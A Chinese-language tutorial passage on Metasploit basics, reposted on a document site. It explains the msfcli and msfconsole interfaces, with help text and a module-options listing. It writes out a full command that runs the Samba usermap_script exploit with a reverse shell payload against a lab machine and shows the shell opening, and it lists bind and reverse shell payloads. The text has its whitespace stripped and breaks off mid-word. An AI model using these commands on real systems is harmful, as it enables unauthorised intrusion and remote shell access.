您好,欢迎访问三七文档
当前位置:首页 > 商业/管理/HR > 质量控制/管理 > 03 Metasploit Fundamentals
Metasploit基础知识整理此文档,纯粹出于兴趣爱好,如果有涉及版权的问题,请联系原文档的作者.由于本人能力有限,文档中难免会有些错误,欢迎大家来信指正.[原文]基础知识Metasploit框架提供了多种不同的接口,每个接口都有自己的优势与不足。尽管如此,目前仍没有一个很好的接口用于使用MSF(尽管msfconsole能够访问Metasploit的众多特性)。当然,了解熟悉MSF提供的所有接口,多工作还是很有效的。MsfcliMsfcli为framework提供了一个强劲的命令行接口.root@kali:~#msfcli-hUsage:/opt/metasploit/msf3/msfcliexploit_nameoption=value[mode]=======================================================================ModeDescription---------------(A)dvanced查看模块可用的一些高级参数(AC)tions显示附加模块的可用操作(C)heck对所选模块进行常规检查(E)xecute执行所选模块(H)elp显示Msfcli帮助信息(I)DSEvasion显示模块可用的IDS逃逸机制(O)ptions显示模块参数选项(P)ayloads显示模块可用的攻击载荷(S)ummary显示模块的整体信息(T)argets显示溢出模块可选的目标类型msfcli使用“=”为参数选项赋值,所有选项对大小写敏感。root@kali:~#msfcliexploit/multi/samba/usermap_scriptRHOST=172.16.194.172PAYLOAD=cmd/unix/reverseLHOST=172.16.194.163E[*]Pleasewaitwhileweloadthemoduletree...#############################################################################################################################################################################################=[metasploitv4.5.0-dev[core:4.5api:1.0]+----=[936exploits-500auxiliary-151post+----=[252payloads-28encoders-8nops=[svnr15767updatedtoday(2012.08.22)RHOST=172.16.194.172PAYLOAD=cmd/unix/reverse[*]Startedreversedoublehandler[*]Acceptedthefirstclientconnection...[*]Acceptedthesecondclientconnection...[*]Command:echocSKqD83oiquo0xMr;[*]WritingtosocketA[*]WritingtosocketB[*]Readingfromsockets...[*]ReadingfromsocketB[*]B:cSKqD83oiquo0xMr\r\n[*]Matching...[*]Aisinput...[*]Commandshellsession1opened(172.16.194.163:4444-172.16.194.172:57682)at2012-06-1409:58:19-0400uname-aLinuxmetasploitable2.6.24-16-server#1SMPThuApr1013:58:00UTC2008i686GNU/Linux如果你不清楚某个模块有哪些参数,可以在所选模块字符串后面加上大写字母’O’.root@kali:~#msfcliexploit/multi/samba/usermap_scriptO[*]Pleasewaitwhileweloadthemoduletree...NameCurrentSettingRequiredDescription--------------------------------------RHOSTyesThetargetaddressRPORT139yesThetargetport如果想要知道所选模块有哪些攻击载荷可用,可以在字符串后加大写字母’P’root@bt:~#msfcliexploit/multi/samba/usermap_scriptP[*]Pleasewaitwhileweloadthemoduletree...Compatiblepayloads===================NameDescription---------------cmd/unix/bind_inetdListenforaconnectionandspawnacommandshell(persistent)cmd/unix/bind_netcatListenforaconnectionandspawnacommandshellvianetcatcmd/unix/bind_netcat_ipv6Listenforaconnectionandspawnacommandshellvianetcatcmd/unix/bind_perlListenforaconnectionandspawnacommandshellviaperlcmd/unix/bind_perl_ipv6Listenforaconnectionandspawnacommandshellviaperlcmd/unix/bind_rubyContinuallylistenforaconnectionandspawnacommandshellviaRubycmd/unix/bind_ruby_ipv6ContinuallylistenforaconnectionandspawnacommandshellviaRubycmd/unix/genericExecutesthesuppliedcommandcmd/unix/reverseCreatesaninteractiveshellthroughtwoinboundconnectionscmd/unix/reverse_netcatCreatesaninteractiveshellvianetcatcmd/unix/reverse_perlCreatesaninteractiveshellviaperlcmd/unix/reverse_pythonConnectbackandcreateacommandshellviaPythoncmd/unix/reverse_rubyConnectbackandcreateacommandshellviaRuby其他可用的选项,请参阅”msfcli-h”msfcli的优点:能够直接执行溢出和附加模块对指定的任务很有效有益于了解学习MSF为测试或开发一个新的溢出模块提供了便利为完成一次性溢出提供了便利如果你已了解溢出模块和所需选项,使用msfcli非常不错在脚本和自动化操作中也很不错msfcli的不足:很多方面并不像msfconsole那样出色每次只能处理一个shell无法胜任客户端攻击任务不支持msfconsole的高级自动化操作Msfconsolemsfconsole可能是MSF最流行的一个接口,它提供了一个高度集中的控制台,允许你显示Metasploit框架所有可用的参数选项。第一次接触msfconsole可能很吓着你,一旦你熟悉这些命令的语法,你就能体会到这个接口的强大。内容1.优点2.运行3.帮助4.Tab自动完成优点唯一的一种能够访问Metasploit众多特性的途径为Metasploit框架提供了一个基于命令行的接口包含MSF众多特性且最稳定的接口支持行读取,tab功能及命令自动补全可以执行某些外部命令msfping-c2[*]exec:ping-c2(173.194.72.147)56(84)bytesofdata.64bytesfromtf-in-f147.1e100.net(173.194.72.147):icmp_seq=1ttl=46time=62.2ms64bytesfromtf-in-f147.1e100.net(173.194.72.147):icmp_seq=2ttl=46time=69.8ms---=62.274/66.039/69.805/3.774msmsf运行运行msfconsole,只需在命令行窗口输入’msfconsole’。msfconsole位于/opt/metasploit/apps/pro/msf3目录。root@kali:~#msfconsoleIIIIIIdTb.dTb_.---._II4'v'B.'.'/|`.'.II6..P:.'/|`.:II'T;..;P''.'/|`.'II'T;;P'`./|.'IIIIII'YvP'`-.__|__.-'Iloveshells--egypt=[metasploitv4.5.0-dev[core:4.5api:1.0]+----=[927exploits-499auxiliary-151post+----=[251payloads-28encoders-8nopsmsf帮助使用’msfconsole-h’,查看参数的具体用法。root@kali:/#msfconsole-hUsage:msfconsole[options]Specificoptions:-dExecutetheconsoleasdefanged-rfilenameExecutethespecifiedresourcefile-ofilenameOutputtothespecifiedfile-cfilenameLoadthespecifiedconfigurationfile-mdirectorySpecifiesanadditionalmodulesearchpath-ppluginLoadapluginonstartup-y,--yamldatabase.ymlSpecifyaYAMLfilecontainingdatabasesettings-M,--migration-pathdirSpecifyadirectorycontainingadditionalDBmigrations-eproduction|development,SpecifythedatabaseenvironmenttoloadfromtheYAML--environment-v,--versionShowversion-L,--real-readlineUsethesystemReadlinelibraryinsteadofRbReadline-n,--no-databaseDisabledatabasesupport-q,--quietDonotprintthebanneronstartupCommonoptions:-h,--helpShowthismessage在ms
本文标题:03 Metasploit Fundamentals
链接地址:https://www.777doc.com/doc-6207023 .html